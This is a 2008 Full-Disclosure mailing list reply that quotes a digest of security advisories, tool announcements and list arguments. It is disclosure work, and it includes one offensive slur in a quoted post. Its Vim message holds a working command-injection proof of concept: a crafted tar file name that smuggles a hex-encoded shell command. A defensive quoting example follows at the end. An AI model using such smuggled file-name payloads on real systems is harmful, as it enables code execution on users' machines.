Message-ID: <BLU115-W501D3315358C092640A8DCDC990@phx.gbl>
Date: Wed, 2 Jul 2008 14:15:35 +0300
From: badr muhyeddin <gigiyousef@...mail.com>
To: <full-disclosure@...ts.grok.org.uk>
Subject: Re: Full-Disclosure Digest, Vol 41, Issue 3


> From: full-disclosure-request@...ts.grok.org.uk
> Subject: Full-Disclosure Digest, Vol 41, Issue 3
> To: full-disclosure@...ts.grok.org.uk
> Date: Wed, 2 Jul 2008 12:00:01 +0100
>
> Send Full-Disclosure mailing list submissions to
> full-disclosure@...ts.grok.org.uk
>
> To subscribe or unsubscribe via the World Wide Web, visit
> https://lists.grok.org.uk/mailman/listinfo/full-disclosure
> or, via email, send a message with subject or body 'help' to
> full-disclosure-request@...ts.grok.org.uk
>
> You can reach the person managing the list at
> full-disclosure-owner@...ts.grok.org.uk
>
> When replying, please edit your Subject line so it is more specific
> than "Re: Contents of Full-Disclosure digest..."
>
>
> Note to digest recipients - when replying to digest posts, please trim your post appropriately. Thank you.
>
>
> Today's Topics:
>
>    1. [ GLSA 200807-01 ] Python: Multiple integer overflows
>       (Tobias Heinlein)
>    2. [ GLSA 200807-02 ] Motion: Execution of arbitrary code
>       (Tobias Heinlein)
>    3. Alphanumeric shellcode improvements (Berend-Jan Wever)
>    4. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation
>       Vulnerability (mrdkaaa@...eam.cz)
>    5. Re: Collection of Vulnerabilities in Fully Patched Vim 7.1
>       (Jan Minář)
>    6. [SECURITY] [DSA 1560-1] New sympa packages fix denial of
>       service (Steve Kemp)
>    7. [tool] ratproxy - passive web application security assessment
>       tool (Michal Zalewski)
>    8. Re: [SCANIT-2008-001] QNX phgrafx Privilege Escalation
>       Vulnerability (Filipe Balestra)
>    9. Re: Full-Disclosure? introducing lul-disclosure.
>       (Tonnerre Lombard)
>   10. Deepsec Talks 2007 are online - registration for 2008 is open
>       (DeepSec 2008)
>   11. Re: Full-Disclosure? introducing lul-disclosure. (root)
>
>
> ----------------------------------------------------------------------
>
> Message: 1
> Date: Tue, 01 Jul 2008 13:51:43 +0200
> From: Tobias Heinlein <keytoaster@...too.org>
> Subject: [Full-disclosure] [ GLSA 200807-01 ] Python: Multiple integer
>         overflows
> To: gentoo-announce@...too.org
> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
>         security-alerts@...uxsecurity.com
> Message-ID: <486A1A4F.1080404@...too.org>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200807-01
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: Python: Multiple integer overflows
> Date: July 01, 2008
> Bugs: #216673, #217221
> ID: 200807-01
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple integer overflows may allow for Denial of Service.
>
> Background
> ==========
>
> Python is an interpreted, interactive, object-oriented programming
> language.
>
> Affected packages
> =================
>
>      -------------------------------------------------------------------
>      Package          /  Vulnerable  /                       Unaffected
>      -------------------------------------------------------------------
>   1  dev-lang/python     < 2.4.4-r13                        *>= 2.3.6-r6
>                                                              >= 2.4.4-r13
>
> Description
> ===========
>
> Multiple vulnerabilities were discovered in Python:
>
> * David Remahl reported multiple integer overflows in the file
>   imageop.c, leading to a heap-based buffer overflow (CVE-2008-1679).
>   This issue is due to an incomplete fix for CVE-2007-4965.
>
> * Justin Ferguson discovered that an integer signedness error in the
>   zlib extension module might trigger insufficient memory allocation
>   and a buffer overflow via a negative signed integer (CVE-2008-1721).
>
> * Justin Ferguson discovered that insufficient input validation in
>   the PyString_FromStringAndSize() function might lead to a buffer
>   overflow (CVE-2008-1887).
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities to cause a Denial
> of Service or possibly the remote execution of arbitrary code with the
> privileges of the user running Python.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> The imageop module is no longer built in the unaffected versions.
>
> All Python 2.3 users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=dev-lang/python-2.3.6-r6"
>
> All Python 2.4 users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=dev-lang/python-2.4.4-r13"
>
> References
> ==========
>
> [ 1 ] CVE-2008-1679
>       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1679
> [ 2 ] CVE-2008-1721
>       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1721
> [ 3 ] CVE-2008-1887
>       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1887
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200807-01.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security@...too.org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 197 bytes
> Desc: OpenPGP digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/26592a7c/attachment-0001.bin
>
> ------------------------------
>
> Message: 2
> Date: Tue, 01 Jul 2008 13:59:36 +0200
> From: Tobias Heinlein <keytoaster@...too.org>
> Subject: [Full-disclosure] [ GLSA 200807-02 ] Motion: Execution of
>         arbitrary code
> To: gentoo-announce@...too.org
> Cc: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
>         security-alerts@...uxsecurity.com
> Message-ID: <486A1C28.3010409@...too.org>
> Content-Type: text/plain; charset="utf-8"
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> Gentoo Linux Security Advisory GLSA 200807-02
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
> http://security.gentoo.org/
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Severity: Normal
> Title: Motion: Execution of arbitrary code
> Date: July 01, 2008
> Bugs: #227053
> ID: 200807-02
>
> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
>
> Synopsis
> ========
>
> Multiple vulnerabilities in Motion might result in the execution of
> arbitrary code.
>
> Background
> ==========
>
> Motion is a program that monitors the video signal from one or more
> cameras and is able to detect motions.
>
> Affected packages
> =================
>
>      -------------------------------------------------------------------
>      Package            /  Vulnerable  /                     Unaffected
>      -------------------------------------------------------------------
>   1  media-video/motion    < 3.2.10.1                        >= 3.2.10.1
>
> Description
> ===========
>
> Nico Golde reported an off-by-one error within the read_client()
> function in the webhttpd.c file, leading to a stack-based buffer
> overflow. Stefan Cornelius (Secunia Research) reported a boundary error
> within the same function, also leading to a stack-based buffer
> overflow. Both vulnerabilities require that the HTTP Control interface
> is enabled.
>
> Impact
> ======
>
> A remote attacker could exploit these vulnerabilities by sending an
> overly long or specially crafted request to a vulnerable Motion HTTP
> control interface, possibly resulting in the execution of arbitrary
> code with the privileges of the motion user.
>
> Workaround
> ==========
>
> There is no known workaround at this time.
>
> Resolution
> ==========
>
> All Motion users should upgrade to the latest version:
>
>     # emerge --sync
>     # emerge --ask --oneshot --verbose ">=media-video/motion-3.2.10.1"
>
> References
> ==========
>
> [ 1 ] CVE-2008-2654
>       http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2654
>
> Availability
> ============
>
> This GLSA and any updates to it are available for viewing at
> the Gentoo Security Website:
>
> http://security.gentoo.org/glsa/glsa-200807-02.xml
>
> Concerns?
> =========
>
> Security is a primary focus of Gentoo Linux and ensuring the
> confidentiality and security of our users machines is of utmost
> importance to us. Any security concerns should be addressed to
> security@...too.org or alternatively, you may file a bug at
> http://bugs.gentoo.org.
>
> License
> =======
>
> Copyright 2008 Gentoo Foundation, Inc; referenced text
> belongs to its owner(s).
>
> The contents of this document are licensed under the
> Creative Commons - Attribution / Share Alike license.
>
> http://creativecommons.org/licenses/by-sa/2.5
>
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 197 bytes
> Desc: OpenPGP digital signature
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/b9cded25/attachment-0001.bin
>
> ------------------------------
>
> Message: 3
> Date: Tue, 1 Jul 2008 14:18:34 +0200
> From: "Berend-Jan Wever" <berendjanwever@...il.com>
> Subject: [Full-disclosure] Alphanumeric shellcode improvements
> To: full-disclosure@...ts.grok.org.uk
> Message-ID:
>         <3fa2f5bb0807010518g1316eb13habc42e109ee1b7d9@...l.gmail.com>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Hi all,
>
> I've not had as much opportunity in the last three years to contribute, but
> I do have some new stuff: I've decided to pre-release some parts of ALPHA3,
> the upcoming new version of my alphanumeric shellcode encoder:
> * I've reduced the size of the mixedcase ascii decoder:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a lowercase ascii decoder:
> http://skypher.com/wiki/index.php?title=Lowercase_ASCII_alphanumeric_code_decoder_for_x86
> * I've created a mixedcase ascii decoder for x64:
> http://skypher.com/wiki/index.php?title=Mixedcase_ASCII_alphanumeric_code_decoder_for_x64
> See http://skypher.com/wiki/index.php?title=ALPHA3 for a complete list and
> some documentation.
>
> Cheers,
> SkyLined
>
> --
> Berend-Jan "SkyLined" Wever
> Email & Live messenger: berendjanwever@...il.com
> --
> 'The historical abuses of new data occurred between the time that a few
> people learned the important thing and the time when that important thing
> became general knowledge. To the Gowachin and to BuSab it was the "Data
> Gap," a source of constant danger.'
> -- Frank Herbert, 'The Dosadi Experiment'
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080701/adf69bc9/attachment-0001.html
>
> ------------------------------
>
> Message: 4
> Date: Tue, 01 Jul 2008 16:39:54 +0200 (CEST)
> From: mrdkaaa@...eam.cz
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
>         Escalation Vulnerability
> To: full-disclosure@...ts.grok.org.uk
> Message-ID: <4.4-28953-1047754371-1214923194@...eam.cz>
> Content-Type: text/plain; charset="us-ascii"
>
> This vulnerability is at least two years old. Anyway, what's the point of releasing
> a security advisory for a vendor well known to never going to patch it?
>
>
>
> ------------------------------
>
> Message: 5
> Date: Tue, 1 Jul 2008 20:36:29 +0100
> From: "Jan Minář" <rdancer@...ncer.org>
> Subject: Re: [Full-disclosure] Collection of Vulnerabilities in Fully
>         Patched Vim 7.1
> To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com,
>         vim_dev@...glegroups.com, "Bram Moolenaar" <Bram@...lenaar.net>
> Cc: bugs@....org
> Message-ID:
>         <6edf76c20807011236t7f96955h924c2692705b6ff4@...l.gmail.com>
> Content-Type: text/plain; charset=UTF-8
>
> On Sat, Jun 14, 2008 at 2:09 PM, Bram Moolenaar <Bram@...lenaar.net> wrote:
> >
> > Jan Minar wrote:
> >
> >> 1. Summary
> >>
> >> Product  : Vim -- Vi IMproved
> >> Version  : Tested with 7.1.314 and 6.4
> >> Impact   : Arbitrary code execution
> >> Wherefrom: Local and remote
> >> Original : http://www.rdancer.org/vulnerablevim.html
> >>
> >> Improper quoting in some parts of Vim written in the Vim Script can lead to
> >> arbitrary code execution upon opening a crafted file.
> >
> > Note that version 7.1.314, as reported in the Summary, does not have
> > most of the reported problems. The problems in the plugins have also
> > been fixed, this requires updating the runtime files. Information about
> > that can be found at http://www.vim.org/runtime.php
>
> I do apologize: as written in the advisory, the version I worked with
> was 7.1.298. 7.1.314 was only partly vulnerable. FWIW, I have
> updated the advisory at http://www.rdancer.orgvulnerablevim.html .
>
> Thanks to Bram for all the good work.
>
> 7.2a.10 with updated runtime is still vulnerable to the zipplugin
> attack, and an updated tarplugin attack:
>
> -------------------------------------------
> -------- Test results below ---------------
> -------------------------------------------
> filetype.vim
> strong : EXPLOIT FAILED
> weak : EXPLOIT FAILED
> tarplugin : EXPLOIT FAILED
> tarplugin.updated: VULNERABLE
> zipplugin : VULNERABLE
> xpm.vim
> xpm : EXPLOIT FAILED
> xpm2 : EXPLOIT FAILED
> remote : EXPLOIT FAILED
> gzip_vim : EXPLOIT FAILED
> netrw : EXPLOIT FAILED
>
> The original tarplugin exploit now produces a string of telling error messages:
>
> /bin/bash: so%: command not found
> tar: /home/rdancer/vuln/vim/tarplugin/sploit/foo'|sosploit/foo:
> Cannot open: No such file or directory
> tar: Error is not recoverable: exiting now
> /bin/bash: retu: command not found
> /bin/bash: bar.tar|retu|'bar.tar: command not found
>
> It's easy to see that it is still possible to execute arbitrary shell commands.
>
> $VIMRUNTIME/autoload/tar.vim of Vim 7.2a.10:
>
>    136   if tarfile =~# '\.\(gz\|tgz\)$'
>    137 "  call Decho("1: exe silent r! gzip -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *138    exe "silent r! gzip -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
>    139   elseif tarfile =~# '\.lrp'
>    140 "  call Decho("2: exe silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *141    exe "silent r! cat -- ".s:Escape(tarfile)."|gzip -d -c -|".g:tar_cmd." -".g:tar_browseoptions." - "
>    142   elseif tarfile =~# '\.bz2$'
>    143 "  call Decho("3: exe silent r! bzip2 -d -c ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - ")
>   *144    exe "silent r! bzip2 -d -c -- ".s:Escape(tarfile)." | ".g:tar_cmd." -".g:tar_browseoptions." - "
>    145   else
>    146 "  call Decho("4: exe silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile))
>  **147    exe "silent r! ".g:tar_cmd." -".g:tar_browseoptions." ".s:Escape(tarfile)
>  [...]
>    444 fun s:Escape(name)
>    445   " shellescape() was added by patch 7.0.111
>    446   if exists("*shellescape")
>    447    let qnameq= shellescape(a:name)
>    448   else
>    449    let qnameq= g:tar_shq . a:name . g:tar_shq
>    450   endif
>    451   return qnameq
>    452 endfun
>
> (*) s:Escape() does not suffice, as it fails to escape ``%'' and friends.
>
> (**) tar(1) allows arbitrary command execution via options ``--to-command'',
> and ``--use-compress-program''.
>
>
> The updated tarplugin attack is rather simple:
>
> $ rm -rf ./*
> $ touch "foo%;eval eval \`echo 0:64617465203e2070776e6564 |
> xxd -r\`;'bar.tar"
> $ vim +:q ./foo*
> $ ls -l pwned
> -rw-r--r-- 1 rdancer users 29 2008-07-01 20:18 pwned
>
> Cheers,
> Jan Minar.
>
>
>
> ------------------------------
>
> Message: 6
> Date: Tue, 1 Jul 2008 21:25:39 +0100
> From: Steve Kemp <skx@...ian.org>
> Subject: [Full-disclosure] [SECURITY] [DSA 1560-1] New sympa packages
>         fix denial of service
> To: debian-security-announce@...ts.debian.org
> Message-ID: <20080701202539.GA32605@...ve.org.uk>
> Content-Type: text/plain; charset=us-ascii
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> - ------------------------------------------------------------------------
> Debian Security Advisory DSA-1600-1                  security@...ian.org
> http://www.debian.org/security/                               Steve Kemp
> July 01, 2008                         http://www.debian.org/security/faq
> - ------------------------------------------------------------------------
>
> Package        : sympa
> Vulnerability  : dos
> Problem type   : remote
> Debian-specific: no
> CVE Id(s)      : CVE-2008-1648
> Debian Bug     : 475163
>
> It was discovered that sympa, a modern mailing list manager, would
> crash when processing certain types of malformed messages.
>
> For the stable distribution (etch), this problem has been fixed in version
> 5.2.3-1.2+etch1.
>
> For the unstable distribution (sid), this problem has been fixed in
> version 5.3.4-4.
>
> We recommend that you upgrade your sympa package.
>
>
> Upgrade instructions
> - --------------------
>
> wget url
>         will fetch the file for you
> dpkg -i file.deb
>         will install the referenced file.
>
> If you are using the apt-get package manager, use the line for
> sources.list as given below:
>
> apt-get update
>         will update the internal database
> apt-get upgrade
>         will install corrected packages
>
> You may use an automated update by adding the resources from the
> footer to the proper configuration.
>
>
> Debian GNU/Linux 4.0 alias etch
> - -------------------------------
>
> These files will probably be moved into the stable distribution on
> its next update.
>
> - ---------------------------------------------------------------------------------
> For apt-get: deb http://security.debian.org/ stable/updates main
> For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
> Mailing list: debian-security-announce@...ts.debian.org
> Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.4.6 (GNU/Linux)
>
> iD8DBQFIapKKwM/Gs81MDZ0RAqAtAJ4qQlnuRralKZTMQhtDqYvMXfaqdQCgof4S
> 6REh7OX9zxqgWYGHqQWtEpQ=
> =ANTa
> -----END PGP SIGNATURE-----
>
>
>
> ------------------------------
>
> Message: 7
> Date: Wed, 2 Jul 2008 02:02:02 +0200 (CEST)
> From: Michal Zalewski <lcamtuf@...ne.cc>
> Subject: [Full-disclosure] [tool] ratproxy - passive web application
>         security assessment tool
> To: bugtraq@...urityfocus.com, websecurity@...appsec.org
> Cc: full-disclosure@...ts.grok.org.uk
> Message-ID: <Pine.LNX.4.64.0807012124130.17434@...ne.cc>
> Content-Type: TEXT/PLAIN; charset=US-ASCII; format=flowed
>
> Hi all,
>
> I am happy to announce that we've just open sourced ratproxy - a free,
> passive web security assessment tool. This utility is designed to
> transparently analyze legitimate, browser-driven interactions with tested
> web applications - and automatically pinpoint, annotate, and prioritize
> potential flaws or areas of concern on the fly.
>
> The proxy analyzes problems such as cross-site script inclusion threats,
> insufficient cross-site request forgery defenses, caching issues,
> potentially unsafe cross-domain code inclusion schemes and information
> leakage scenarios, and much more.
>
> For a detailed discussion of the utility, please visit:
> http://code.google.com/p/ratproxy/wiki/RatproxyDoc
>
> Source code is available at:
> http://code.google.com/p/ratproxy/downloads/list
>
> And finally, screenshot of a sample report can be found here:
> http://lcamtuf.coredump.cx/ratproxy-screen.png
>
> The tool should run on Linux, *BSD, MacOS X, and Windows (Cygwin). Since
> it is in beta, there might be some kinks to be ironed out, and not all web
> technologies might be properly accounted for. Feedback is appreciated.
>
> Please keep in mind that the proxy is meant to highlight interesting
> patterns in web applications; a further analysis by a security
> professional is required to interpret the significance of results for a
> particular platform.
>
> Cheers,
> /mz
>
>
>
> ------------------------------
>
> Message: 8
> Date: Wed, 2 Jul 2008 02:19:01 -0300
> From: "Filipe Balestra" <filipe@...estra.com.br>
> Subject: Re: [Full-disclosure] [SCANIT-2008-001] QNX phgrafx Privilege
>         Escalation Vulnerability
> To: <full-disclosure@...ts.grok.org.uk>
> Message-ID: <BEDD65A8CCD54B3BAA75664A0D440A93@...PC>
> Content-Type: text/plain; charset="iso-8859-1"
>
> mrdkaaa,
>
> are you saying that this vulnerability is not new to the public?
>
> The program phgrafx had some vulnerabilities published, but this one is not the same of any other that I can find in securityfocus. One program can have a lot of vulnerabilities :)
>
> But yes, this vulnerability is at least four years old, but was not public.
>
> Anyway, QNX released Service Packs to solve some security problems in the past, and it's not our problem, we are advising the customers, they can choose or not the company. If you are a customer you probably would like to know about security issues in all product that you use. Also, we agree it's a crap vuln, that's why we took too long to release it. Whatever, why hold it?
>
> p.s.: Rodrigo and me are no longer working for Scanit, so it's just a personal opinion, not a company official position. If you want to know about the company vulnerability release process or any other information, please, contact the Scanit R&D team.
>
> Cheers,
>
> Filipe Alcarde Balestra
> -------------- next part --------------
> An HTML attachment was scrubbed...
> URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/cd6c973d/attachment-0001.html
>
> ------------------------------
>
> Message: 9
> Date: Wed, 2 Jul 2008 08:29:43 +0200
> From: Tonnerre Lombard <tonnerre.lombard@...roup.ch>
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
>         lul-disclosure.
> To: staff@...-disclosure.net
> Cc: full-disclosure@...ts.grok.org.uk
> Message-ID: <20080702082943.2811aba5@...yg117.sygroup-int.ch>
> Content-Type: text/plain; charset="iso-8859-1"
>
> Salut,
>
> On Mon, 30 Jun 2008 21:57:29 -0400, staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant
> > steal your money or eat your lunches? Where you can freely submit
> > lulz to be published? Where Theo's defeat and denial are brought to
> > light? Wait no more!
>
> You mean a site which evidently cannot tell the difference between
> local and remote root vulnerabilities? (The local root exploit for
> obsd4 which is published on that site contains a patch to increment the
> count of _remote_ vulnerabilities on the obsd web site.)
>
> Tonnerre
> --
> SyGroup GmbH
> Tonnerre Lombard
>
> Solutions Systematiques
> Tel:+41 61 333 80 33    Güterstrasse 86
> Fax:+41 61 383 14 67    4053 Basel
> Web:www.sygroup.ch      tonnerre.lombard@...roup.ch
> -------------- next part --------------
> A non-text attachment was scrubbed...
> Name: signature.asc
> Type: application/pgp-signature
> Size: 835 bytes
> Desc: not available
> Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080702/0174b22f/attachment-0001.bin
>
> ------------------------------
>
> Message: 10
> Date: Tue, 01 Jul 2008 21:47:36 +0200
> From: DeepSec 2008 <deepsec@...psec.net>
> Subject: [Full-disclosure] Deepsec Talks 2007 are online -
>         registration for 2008 is open
> To: full-disclosure@...ts.grok.org.uk
> Message-ID: <486A89D8.2000303@...psec.net>
> Content-Type: text/plain; charset=UTF-8; format=flowed
>
> Dear Madam, dear Sir,
>
> DeepSec Vienna, the annual In-Depth Security Conference has opened
> online registrations for 2008. Registrations will receive a discount
> of 5% off the regular fees until August 31st if you use the following
> promotional code: earlybird-L4KZIEUE on our online registration form
> at https://deepsec.net/register/
>
> Videos from 2007 are online:
>
> Also we are happy to announce that talks from last years conference
> are online. Listen to last years talks in full length at:
> http://video.google.com/videosearch?q=deepsec&sitesearch=#
>
> Call for Papers still Open for two weeks:
>
> If you have some good ideas for a Talk at the conference and haven't
> decided yet to submit we encourage you to do so now. We still accept
> submissions at https://deepsec.net/cfp/ or via e-mail to:
> cfp@...psec.net
>
>
> We hope to hear from you and of course to meet in Vienna in November!
>
> Best Regards,
>
> Paul Böhm,
> René Pfeiffer,
> Michael Kafka
> DeepSec GmbH
>
>
> --
> DeepSec In-Depth Security Conference
> November 11nd to 14th 2008, Vienna, Austria
> https://deepsec.net/
>
>
>
> ------------------------------
>
> Message: 11
> Date: Wed, 02 Jul 2008 04:08:38 -0300
> From: root <root_@...ertel.com.ar>
> Subject: Re: [Full-disclosure] Full-Disclosure? introducing
>         lul-disclosure.
> To: staff@...-disclosure.net
> Cc: full-disclosure@...ts.grok.org.uk
> Message-ID: <486B2976.8000708@...ertel.com.ar>
> Content-Type: text/plain; charset=ISO-8859-1; format=flowed
>
> You couldn't do the remote exploit even with a google video documenting
> it step by step.
> More like fail-disclosure.
>
> staff wrote:
> > Are you ready for a site that isn't full of fagottry? Where Gadi cant steal
> > your money or eat your lunches? Where you can freely submit lulz to be
> > published? Where Theo's defeat and denial are brought to light? Wait no
> > more!
> >
> > http://lul-disclosure.net/
> >
> > WhiteHat? BlackHat? We are lulzhat.
> > Fuck you and your hats.
> >
> >
> >
> > ------------------------------------------------------------------------
> >
> > _______________________________________________
> > Full-Disclosure - We believe in it.
> > Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
>
>
>
> ------------------------------
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
> End of Full-Disclosure Digest, Vol 41, Issue 3
> **********************************************

unsubscribe
 

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
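
Added example, not part of the original message and not code from Vim's tar.vim: Message 5 in the quoted digest observes that s:Escape() leaves ``%'' unescaped when the file name is spliced into a ":r !" command, and that tar(1) options can run commands. The Vim script below shows the two quoting forms of shellescape() for that case. TarListSafe, TarReadIntoBuffer and s:ArgvSafe are hypothetical names; GNU tar and a POSIX shell are assumed.

```vim
" Added example (hypothetical helper names, not from tar.vim).
" Lists the members of a tar archive without letting the archive's file
" name reach Vim's command-line expansion or tar's option parser.

" A name that begins with '-' could be read by tar(1) as an option such as
" --to-command or --use-compress-program. Prefixing './' keeps it a path.
function! s:ArgvSafe(name) abort
  return a:name =~# '^-' ? './' . a:name : a:name
endfunction

" Preferred form: system() passes the string straight to the shell, so Vim
" never expands '%', '#' or '!'. Plain shellescape() is the matching quoting.
function! TarListSafe(tarfile) abort
  if !filereadable(a:tarfile)
    throw 'TarListSafe: not a readable file: ' . a:tarfile
  endif
  let l:cmd = 'tar -tf ' . shellescape(s:ArgvSafe(a:tarfile))
  let l:out = system(l:cmd)
  if v:shell_error
    throw 'TarListSafe: tar failed: ' . l:out
  endif
  return split(l:out, "\n")
endfunction

" When the command has to go through ":read !", Vim expands '%' and friends
" before the shell runs. A non-zero {special} argument makes shellescape()
" backslash-escape those items as well, which ":!" then strips again.
function! TarReadIntoBuffer(tarfile) abort
  if !filereadable(a:tarfile)
    throw 'TarReadIntoBuffer: not a readable file: ' . a:tarfile
  endif
  execute 'silent read !tar -tf '
        \ . shellescape(s:ArgvSafe(a:tarfile), 1)
endfunction
```

The first function is the safer default because it avoids the ":!" expansion step entirely; the second only applies where buffer insertion via ":read !" is required.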
